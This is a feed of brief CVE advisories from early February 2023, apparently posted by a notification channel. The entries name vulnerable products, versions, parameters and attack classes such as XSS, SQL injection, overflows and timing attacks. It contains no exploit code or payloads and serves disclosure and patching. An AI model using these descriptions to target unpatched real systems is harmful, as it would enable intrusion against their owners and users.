🚨 CVE-2023-24231A stored cross-site scripting (XSS) vulnerability in the component /php-inventory-management-system/categories.php of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Categories Name parameter.🎖@cveNotify |
|
| 2023-02-10 18:29:49 |
🚨 CVE-2023-24232A stored cross-site scripting (XSS) vulnerability in the component /php-inventory-management-system/product.php of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Name parameter.🎖@cveNotify |
|
| 2023-02-10 18:29:48 |
🚨 CVE-2023-24233A stored cross-site scripting (XSS) vulnerability in the component /php-inventory-management-system/orders.php?o=add of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Client Name parameter.🎖@cveNotify |
|
| 2023-02-10 18:29:47 |
🚨 CVE-2023-24234A stored cross-site scripting (XSS) vulnerability in the component php-inventory-management-system/brand.php of Inventory Management System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Brand Name parameter.🎖@cveNotify |
|
| 2023-02-10 18:29:46 |
🚨 CVE-2023-24613The user interface of Array Networks AG Series and vxAG through 9.4.0.470 could allow a remote attacker to use the gdb tool to overwrite the backend function call stack after accessing the system with administrator privileges. A successful exploit could leverage this vulnerability in the backend binary file that handles the user interface to a cause denial of service attack. This is fixed in AG 9.4.0.481.🎖@cveNotify |
|
| 2023-02-10 18:29:45 |
🚨 CVE-2023-0658A vulnerability, which was classified as critical, was found in Multilaser RE057 and RE170 2.1/2.2. This affects an unknown part of the file /param.file.tgz of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The identifier VDB-220053 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-10 18:29:41 |
🚨 CVE-2022-41973multipath-tools 0.7.7 through 0.9.x before 0.9.2 allows local users to obtain root access, as exploited in conjunction with CVE-2022-41974. Local users able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which could lead to controlled file writes outside of the /dev/shm directory. This could be used indirectly for local privilege escalation to root.🎖@cveNotify |
|
| 2023-02-10 18:29:40 |
🚨 CVE-2023-24574Dell Enterprise SONiC OS, 3.5.3, 4.0.0, 4.0.1, 4.0.2, contains an "Uncontrolled Resource Consumption vulnerability" in authentication component. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to uncontrolled resource consumption by creating permanent home directories for unauthenticated users.🎖@cveNotify |
|
| 2023-02-10 18:29:39 |
🚨 CVE-2023-23119The use of the cyclic redundancy check (CRC) algorithm for integrity check during firmware update makes Ubiquiti airFiber AF2X Radio firmware version 3.2.2 and earlier vulnerable to firmware modification attacks. An attacker can conduct a man-in-the-middle (MITM) attack to modify the new firmware image and bypass the checksum verification.🎖@cveNotify |
|
| 2023-02-10 18:29:38 |
🚨 CVE-2015-10077A vulnerability was found in webbuilders-group silverstripe-kapost-bridge 0.3.3. It has been declared as critical. Affected by this vulnerability is the function index/getPreview of the file code/control/KapostService.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 0.4.0 is able to address this issue. The name of the patch is 2e14b0fd0ea35034f90890f364b130fb4645ff35. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220471.🎖@cveNotify |
|
| 2023-02-09 22:29:50 |
🚨 CVE-2023-23912A vulnerability, found in EdgeRouters Version 2.0.9-hotfix.5 and earlier and UniFi Security Gateways (USG) Version 4.4.56 and earlier with their DHCPv6 prefix delegation set to dhcpv6-stateless or dhcpv6-stateful, allows a malicious actor directly connected to the WAN interface of an affected device to create a remote code execution vulnerability.🎖@cveNotify |
|
| 2023-02-09 22:29:49 |
🚨 CVE-2023-24322A reflected cross-site scripting (XSS) vulnerability in the FileDialog.aspx component of mojoPortal v2.7.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.🎖@cveNotify |
|
| 2023-02-09 22:29:48 |
🚨 CVE-2023-24323Mojoportal v2.7 was discovered to contain an authenticated XML external entity (XXE) injection vulnerability.🎖@cveNotify |
|
| 2023-02-09 22:29:47 |
🚨 CVE-2023-24687Mojoportal v2.7.0.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Company Info Settings component. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtCompanyName parameter.🎖@cveNotify |
|
| 2023-02-09 22:29:46 |
🚨 CVE-2023-24688An issue in Mojoportal v2.7.0.0 allows an unauthenticated attacker to register a new user even if the Allow User Registrations feature is disabled.🎖@cveNotify |
|
| 2023-02-09 22:29:45 |
🚨 CVE-2023-24689An issue in Mojoportal v2.7.0.0 and below allows an authenticated attacker to list all css files inside the root path of the webserver via manipulation of the "s" parameter in /DesignTools/ManageSkin.aspx🎖@cveNotify |
|
| 2023-02-09 22:29:44 |
🚨 CVE-2023-22975jfinal_cms 5.1.0 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-02-09 22:29:43 |
🚨 CVE-2023-0651A vulnerability was found in FastCMS 0.1.0. It has been classified as critical. Affected is an unknown function of the component Template Management. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-220038 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-09 22:29:41 |
🚨 CVE-2023-0646A vulnerability classified as critical was found in dst-admin 1.5.0. Affected by this vulnerability is an unknown functionality of the file /home/cavesConsole. The manipulation of the argument command leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220033 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-09 22:29:39 |
🚨 CVE-2021-36489Buffer Overflow vulnerability in Allegro through 5.2.6 allows attackers to cause a denial of service via crafted PCX/TGA/BMP files to allegro_image addon.🎖@cveNotify |
|
| 2023-02-09 22:29:38 |
🚨 CVE-2023-0650A vulnerability was found in YAFNET up to 3.1.11 and classified as problematic. This issue affects some unknown processing of the component Signature Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.12 is able to address this issue. The name of the patch is a1442a2bacc3335461b44c250e81f8d99c60735f. It is recommended to upgrade the affected component. The identifier VDB-220037 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-09 20:30:09 |
🚨 CVE-2022-45496Buffer overflow vulnerability in function json_parse_string in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges.🎖@cveNotify |
|
| 2023-02-09 20:30:08 |
🚨 CVE-2022-45493Buffer overflow vulnerability in function json_parse_key in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges.🎖@cveNotify |
|
| 2023-02-09 20:30:07 |
🚨 CVE-2022-45491Buffer overflow vulnerability in function json_parse_value in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges.🎖@cveNotify |
|
| 2023-02-09 20:30:06 |
🚨 CVE-2023-23636In Jellyfin 10.8.x through 10.8.3, the name of a playlist is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.🎖@cveNotify |
|
| 2023-02-09 20:30:01 |
🚨 CVE-2023-24815Vert.x-Web is a set of building blocks for building web applications in the java programming language. When running vertx web applications that serve files using `StaticHandler` on Windows Operating Systems and Windows File Systems, if the mount point is a wildcard (`*`) then an attacker can exfiltrate any class path resource. When computing the relative path to locate the resource, in case of wildcards, the code: `return "/" + rest;` from `Utils.java` returns the user input (without validation) as the segment to lookup. Even though checks are performed to avoid escaping the sandbox, given that the input was not sanitized `\` are not properly handled and an attacker can build a path that is valid within the classpath. This issue only affects users deploying in windows environments and upgrading is the advised remediation path. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-02-09 20:30:00 |
🚨 CVE-2023-22302In BIG-IP versions 17.0.x before 17.0.0.2, and 16.1.x beginning in 16.1.2.2 to before 16.1.3.3, when an HTTP profile is configured on a virtual server and conditions beyond the attacker’s control exist on the target pool member, undisclosed requests sent to the BIG-IP system can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-09 20:29:59 |
🚨 CVE-2023-22323In BIP-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, when OCSP authentication profile is configured on a virtual server, undisclosed requests can cause an increase in CPU resource utilization. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-09 20:29:58 |
🚨 CVE-2023-22326In BIG-IP versions 17.0.x before 17.0.0.2, 16.1.x before 16.1.3.3, 15.1.x before 15.1.8.1, 14.1.x before 14.1.5.3, and all versions of 13.1.x, and all versions of BIG-IQ 8.x and 7.1.x, incorrect permission assignment vulnerabilities exist in the iControl REST and TMOS shell (tmsh) dig command which may allow an authenticated attacker with resource administrator or administrator role privileges to view sensitive information. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-09 20:29:57 |
🚨 CVE-2022-30564Some Dahua embedded products have a vulnerability of unauthorized modification of the device timestamp. By sending a specially crafted packet to the vulnerable interface, an attacker can modify the device system time.🎖@cveNotify |
|
| 2023-02-09 20:29:53 |
🚨 CVE-2022-48286The multi-screen collaboration module has a privilege escalation vulnerability. Successful exploitation of this vulnerability may affect data confidentiality.🎖@cveNotify |
|
| 2023-02-09 20:29:52 |
🚨 CVE-2022-48287The HwContacts module has a logic bypass vulnerability. Successful exploitation of this vulnerability may affect data integrity.🎖@cveNotify |
|
| 2023-02-09 20:29:51 |
🚨 CVE-2022-48288The bundle management module lacks authentication and control mechanisms in some APIs. Successful exploitation of this vulnerability may affect data confidentiality.🎖@cveNotify |
|
| 2023-02-09 20:29:50 |
🚨 CVE-2022-48290The phone-PC collaboration module has a logic bypass vulnerability. Successful exploitation of this vulnerability may affect data confidentiality and integrity.🎖@cveNotify |
|
| 2023-02-09 20:29:45 |
🚨 CVE-2022-48293The Bluetooth module has an OOM vulnerability. Successful exploitation of this vulnerability may affect data confidentiality.🎖@cveNotify |
|
| 2023-02-09 20:29:44 |
🚨 CVE-2022-48294The IHwAttestationService interface has a defect in authentication. Successful exploitation of this vulnerability may affect data confidentiality.🎖@cveNotify |
|
| 2023-02-09 20:29:42 |
🚨 CVE-2022-48296The SystemUI has a vulnerability in permission management. Successful exploitation of this vulnerability may cause users to receive broadcasts from malicious apps, conveying false alarm information about external storage devices.🎖@cveNotify |
|
| 2023-02-09 17:30:03 |
🚨 CVE-2017-12621During Jelly (xml) file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity (XXE) attacks in Apache Commons Jelly before 1.0.1.🎖@cveNotify |
|
| 2023-02-09 17:29:59 |
🚨 CVE-2017-5546The freelist-randomization feature in mm/slab.c in the Linux kernel 4.8.x and 4.9.x before 4.9.5 allows local users to cause a denial of service (duplicate freelist entries and system crash) or possibly have unspecified other impact in opportunistic circumstances by leveraging the selection of a large value for a random number.🎖@cveNotify |
|
| 2023-02-09 17:29:58 |
🚨 CVE-2022-3550A vulnerability classified as critical was found in X.org Server. Affected by this vulnerability is the function _GetCountedString of the file xkb/xkb.c. The manipulation leads to buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211051.🎖@cveNotify |
|
| 2023-02-09 17:29:57 |
🚨 CVE-2022-3551A vulnerability, which was classified as problematic, has been found in X.org Server. Affected by this issue is the function ProcXkbGetKbdByName of the file xkb/xkb.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211052.🎖@cveNotify |
|
| 2023-02-09 17:29:56 |
🚨 CVE-2017-15699A Denial of Service vulnerability was found in Apache Qpid Dispatch Router versions 0.7.0 and 0.8.0. To exploit this vulnerability, a remote user must be able to establish an AMQP connection to the Qpid Dispatch Router and send a specifically crafted AMQP frame which will cause it to segfault and shut down.🎖@cveNotify |
|
| 2023-02-09 17:29:55 |
🚨 CVE-2023-0599Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using a specially crafted request. Note that in most deployments, all Metasploit Pro users tend to enjoy privileges equivalent to local administrator.🎖@cveNotify |
|
| 2023-02-09 17:29:51 |
🚨 CVE-2023-23469IBM ICP4A - Automation Decision Services 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 244504.🎖@cveNotify |
|
| 2023-02-09 17:29:50 |
🚨 CVE-2020-2801Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. Note: The patch for this issue will address the vulnerability only if the WLS instance is using JDK 1.7.0_191 or later, or JDK 1.8.0_181 or later. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-02-09 17:29:49 |
🚨 CVE-2021-38291FFmpeg version (git commit de8e6e67e7523e48bb27ac224a0b446df05e1640) suffers from a an assertion failure at src/libavutil/mathematics.c.🎖@cveNotify |
|
| 2023-02-09 17:29:48 |
🚨 CVE-2020-12077The mappress-google-maps-for-wordpress plugin before 2.53.9 for WordPress does not correctly implement AJAX functions with nonces (or capability checks), leading to remote code execution.🎖@cveNotify |
|
| 2023-02-09 17:29:43 |
🚨 CVE-2023-22374In BIG-IP starting in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5 on their respective branches, a format string vulnerability exists in iControl SOAP that allows an authenticated attacker to crash the iControl SOAP CGI process or, potentially execute arbitrary code. In appliance mode BIG-IP, a successful exploit of this vulnerability can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2023-02-09 17:29:42 |
🚨 CVE-2023-0574Server-Side Request Forgery (SSRF), Improperly Controlled Modification of Dynamically-Determined Object Attributes, Improper Restriction of Excessive Authentication Attempts vulnerability in YugaByte, Inc. Yugabyte Managed allows Accessing Functionality Not Properly Constrained by ACLs, Communication Channel Manipulation, Authentication Abuse.This issue affects Yugabyte Managed: from 2.0 through 2.13.🎖@cveNotify |
|
| 2023-02-09 17:29:41 |
🚨 CVE-2023-22953In ExpressionEngine before 7.2.6, remote code execution can be achieved by an authenticated Control Panel user.🎖@cveNotify |
|
| 2023-02-09 17:29:40 |
🚨 CVE-2023-0014SAP NetWeaver ABAP Server and ABAP Platform - versions SAP_BASIS 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, KERNEL 7.22, 7.53, 7.77, 7.81, 7.85, 7.89, KRNL64UC 7.22, 7.22EXT, 7.53, KRNL64NUC 7.22, 7.22EXT, creates information about system identity in an ambiguous format. This could lead to capture-replay vulnerability and may be exploited by malicious users to obtain illegitimate access to the system.🎖@cveNotify |
|
| 2023-02-09 15:29:41 |
🚨 CVE-2023-0759Privilege Chaining in GitHub repository cockpit-hq/cockpit prior to 2.3.8.🎖@cveNotify |
|
| 2023-02-09 15:29:40 |
🚨 CVE-2023-0760Heap-based Buffer Overflow in GitHub repository gpac/gpac prior to V2.1.0-DEV.🎖@cveNotify |
|
| 2023-02-09 14:29:38 |
🚨 CVE-2023-0758A vulnerability was found in glorylion JFinalOA 1.0.2 and classified as critical. This issue affects some unknown processing of the file src/main/java/com/pointlion/mvc/common/model/SysOrg.java. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220469 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-09 06:31:06 |
🚨 CVE-2020-25659python-cryptography 3.2 is vulnerable to Bleichenbacher timing attacks in the RSA decryption API, via timed processing of valid PKCS#1 v1.5 ciphertext.🎖@cveNotify |
|
| 2023-02-09 06:31:04 |
🚨 CVE-2018-25014A use of uninitialized value was found in libwebp in versions before 1.0.1 in ReadSymbol().🎖@cveNotify |
|
| 2023-02-09 06:31:01 |
🚨 CVE-2018-25013A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in ShiftBytes().🎖@cveNotify |
|
| 2023-02-09 06:30:58 |
🚨 CVE-2018-25012A heap-based buffer overflow was found in libwebp in versions before 1.0.1 in GetLE24().🎖@cveNotify |
|
| 2023-02-09 06:30:55 |
🚨 CVE-2022-4743A potential memory leak issue was discovered in SDL2 in GLES_CreateTexture() function in SDL_render_gles.c. The vulnerability allows an attacker to cause a denial of service attack. The vulnerability affects SDL2 v2.0.4 and above. SDL-1.x are not affected.🎖@cveNotify |
|
| 2023-02-09 06:30:52 |
🚨 CVE-2021-33657There is a heap overflow problem in video/SDL_pixels.c in SDL (Simple DirectMedia Layer) 2.x to 2.0.18 versions. By crafting a malicious .BMP file, an attacker can cause the application using this library to crash, denial of service or Code execution.🎖@cveNotify |
|
| 2023-02-09 06:30:50 |
🚨 CVE-2020-14410SDL (Simple DirectMedia Layer) through 2.0.12 has a heap-based buffer over-read in Blit_3or4_to_3or4__inversed_rgb in video/SDL_blit_N.c via a crafted .BMP file.🎖@cveNotify |
|
| 2023-02-09 06:30:46 |
🚨 CVE-2020-14409SDL (Simple DirectMedia Layer) through 2.0.12 has an Integer Overflow (and resultant SDL_memcpy heap corruption) in SDL_BlitCopy in video/SDL_blit_copy.c via a crafted .BMP file.🎖@cveNotify |
|
| 2023-02-09 06:30:43 |
🚨 CVE-2019-7635SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in Blit1to4 in video/SDL_blit_1.c.🎖@cveNotify |
|
| 2023-02-09 06:30:40 |
🚨 CVE-2019-7638SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in Map1toN in video/SDL_pixels.c.🎖@cveNotify |
|
| 2023-02-09 06:30:34 |
🚨 CVE-2019-7636SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in SDL_GetRGB in video/SDL_pixels.c.🎖@cveNotify |
|
| 2023-02-09 06:30:29 |
🚨 CVE-2019-7576SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (outside the wNumCoef loop).🎖@cveNotify |
|
| 2023-02-09 06:30:26 |
🚨 CVE-2019-7574SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in IMA_ADPCM_decode in audio/SDL_wave.c.🎖@cveNotify |
|
| 2023-02-09 06:30:23 |
🚨 CVE-2019-7575SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer overflow in MS_ADPCM_decode in audio/SDL_wave.c.🎖@cveNotify |
|
| 2023-02-09 06:30:20 |
🚨 CVE-2019-7578SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in InitIMA_ADPCM in audio/SDL_wave.c.🎖@cveNotify |
|
| 2023-02-09 06:30:17 |
🚨 CVE-2019-7577SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a buffer over-read in SDL_LoadWAV_RW in audio/SDL_wave.c.🎖@cveNotify |
|
| 2023-02-09 06:30:15 |
🚨 CVE-2022-29622An arbitrary file upload vulnerability in formidable v3.1.4 allows attackers to execute arbitrary code via a crafted filename. NOTE: some third parties dispute this issue because the product has common use cases in which uploading arbitrary files is the desired behavior. Also, there are configuration options in all versions that can change the default behavior of how files are handled.🎖@cveNotify |
|
| 2023-02-09 06:30:12 |
🚨 CVE-2019-7573SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (inside the wNumCoef loop).🎖@cveNotify |
|
| 2023-02-09 06:30:10 |
🚨 CVE-2019-7572SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a buffer over-read in IMA_ADPCM_nibble in audio/SDL_wave.c.🎖@cveNotify |
|
| 2023-02-09 06:30:07 |
🚨 CVE-2019-13616SDL (Simple DirectMedia Layer) through 1.2.15 and 2.x through 2.0.9 has a heap-based buffer over-read in BlitNtoN in video/SDL_blit_N.c when called from SDL_SoftBlit in video/SDL_blit.c.🎖@cveNotify |
|
| 2023-02-09 02:29:49 |
🚨 CVE-2023-25168Wings is Pterodactyl's server control plane. This vulnerability can be used to delete files and directories recursively on the host system. This vulnerability can be combined with `GHSA-p8r3-83r8-jwj5` to overwrite files on the host system. In order to use this exploit, an attacker must have an existing "server" allocated and controlled by Wings. This vulnerability has been resolved in version `v1.11.4` of Wings, and has been back-ported to the 1.7 release series in `v1.7.4`. Anyone running `v1.11.x` should upgrade to `v1.11.4` and anyone running `v1.7.x` should upgrade to `v1.7.4`. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-02-09 02:29:48 |
🚨 CVE-2023-0417Memory leak in the NFS dissector in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-09 02:29:44 |
🚨 CVE-2023-0412TIPC dissector crash in Wireshark 4.0.0 to 4.0.2 and 3.6.0 to 3.6.10 and allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-09 02:29:43 |
🚨 CVE-2022-4345Infinite loops in the BPv6, OpenFlow, and Kafka protocol dissectors in Wireshark 4.0.0 to 4.0.1 and 3.6.0 to 3.6.9 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-02-09 02:29:42 |
🚨 CVE-2022-2097AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).🎖@cveNotify |
|
| 2023-02-09 02:29:39 |
🚨 CVE-2023-0249Delta Electronics DIAScreen versions 1.2.1.23 and prior are vulnerable to out-of-bounds write, which may allow an attacker to remotely execute arbitrary code.🎖@cveNotify |
|
| 2023-02-09 02:29:38 |
🚨 CVE-2023-0251Delta Electronics DIAScreen versions 1.2.1.23 and prior are vulnerable to a buffer overflow through improper restrictions of operations within memory, which could allow an attacker to remotely execute arbitrary code.🎖@cveNotify |
|
| 2023-02-09 02:29:37 |
🚨 CVE-2017-18539The weblibrarian plugin before 3.4.8.6 for WordPress has XSS via front-end short codes.🎖@cveNotify |
|
| 2023-02-09 00:29:37 |
🚨 CVE-2022-48079Monnai aaPanel host system v1.5 contains an access control issue which allows attackers to escalate privileges and execute arbitrary code via uploading a crafted PHP file to the virtual host directory of the system.🎖@cveNotify |
|
| 2023-02-08 22:29:59 |
🚨 CVE-2023-23126** DISPUTED ** Connectwise Automate 2022.11 is vulnerable to Clickjacking. The login screen can be iframed and used to manipulate users to perform unintended actions. NOTE: the vendor's position is that a Content-Security-Policy HTTP response header is present to block this attack.🎖@cveNotify |
|
| 2023-02-08 22:29:58 |
🚨 CVE-2023-23136lmxcms v1.41 was discovered to contain an arbitrary file deletion vulnerability via BackdbAction.class.php.🎖@cveNotify |
|
| 2023-02-08 22:29:57 |
🚨 CVE-2022-47717Last Yard 22.09.8-1 is vulnerable to Cross-origin resource sharing (CORS).🎖@cveNotify |
|
| 2023-02-08 22:29:56 |
🚨 CVE-2022-47715In Last Yard 22.09.8-1, the cookie can be stolen via via unencrypted traffic.🎖@cveNotify |
|
| 2023-02-08 22:29:52 |
🚨 CVE-2022-47714Last Yard 22.09.8-1 does not enforce HSTS headers🎖@cveNotify |
|
| 2023-02-08 22:29:51 |
🚨 CVE-2023-0617A vulnerability was found in TRENDNet TEW-811DRU 1.0.10.0. It has been classified as critical. This affects an unknown part of the file /wireless/guestnetwork.asp of the component httpd. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219957 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-08 22:29:50 |
🚨 CVE-2023-23128** DISPUTED **Connectwise Control 22.8.10013.8329 is vulnerable to Cross Origin Resource Sharing (CORS). The vendor's position is that two endpoints have Access-Control-Allow-Origin wildcarding to support product functionality, and that there is no risk from this behavior. The vulnerability report is thus not valid.🎖@cveNotify |
|
| 2023-02-08 22:29:49 |
🚨 CVE-2023-23130** DISPUTED ** Connectwise Automate 2022.11 is vulnerable to Cleartext authentication. Authentication is being done via HTTP (cleartext) with SSL disabled. OTE: the vendor's position is that, by design, this is controlled by a configuration option in which a customer can choose to use HTTP (rather than HTTPS) during troubleshooting.🎖@cveNotify |
|
| 2023-02-08 22:29:45 |
🚨 CVE-2023-23131Selfwealth iOS mobile App 3.3.1 is vulnerable to Insecure App Transport Security (ATS) Settings.🎖@cveNotify |
|
| 2023-02-08 22:29:44 |
🚨 CVE-2022-47983IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 243161.🎖@cveNotify |
|
| 2023-02-08 22:29:43 |
🚨 CVE-2022-34350IBM API Connect 10.0.0.0 through 10.0.5.0, 10.0.1.0 through 10.0.1.7, and 2018.4.1.0 through 2018.4.1.20 is vulnerable to External Service Interaction attack, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to induce the application to perform server-side DNS lookups or HTTP requests to arbitrary domain names. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. IBM X-Force ID: 230264.🎖@cveNotify |
|
| 2023-02-08 22:29:42 |
🚨 CVE-2022-4304A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.🎖@cveNotify |
|
| 2023-02-08 22:29:38 |
🚨 CVE-2022-4450The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.🎖@cveNotify |
|
| 2023-02-08 22:29:37 |
🚨 CVE-2023-0216An invalid pointer dereference on read can be triggered when an application tries to load malformed PKCS7 data with the d2i_PKCS7(), d2i_PKCS7_bio() or d2i_PKCS7_fp() functions. The result of the dereference is an application crash which could lead to a denial of service attack. The TLS implementation in OpenSSL does not call this function however third party applications might call these functions on untrusted data.🎖@cveNotify |
|
| 2023-02-08 22:29:36 |
🚨 CVE-2023-0217An invalid pointer dereference on read can be triggered when an application tries to check a malformed DSA public key by the EVP_PKEY_public_check() function. This will most likely lead to an application crash. This function can be called on public keys supplied from untrusted sources which could allow an attacker to cause a denial of service attack. The TLS implementation in OpenSSL does not call this function but applications might call the function if there are additional security requirements imposed by standards such as FIPS 140-3.🎖@cveNotify |
|
| 2023-02-08 22:29:35 |
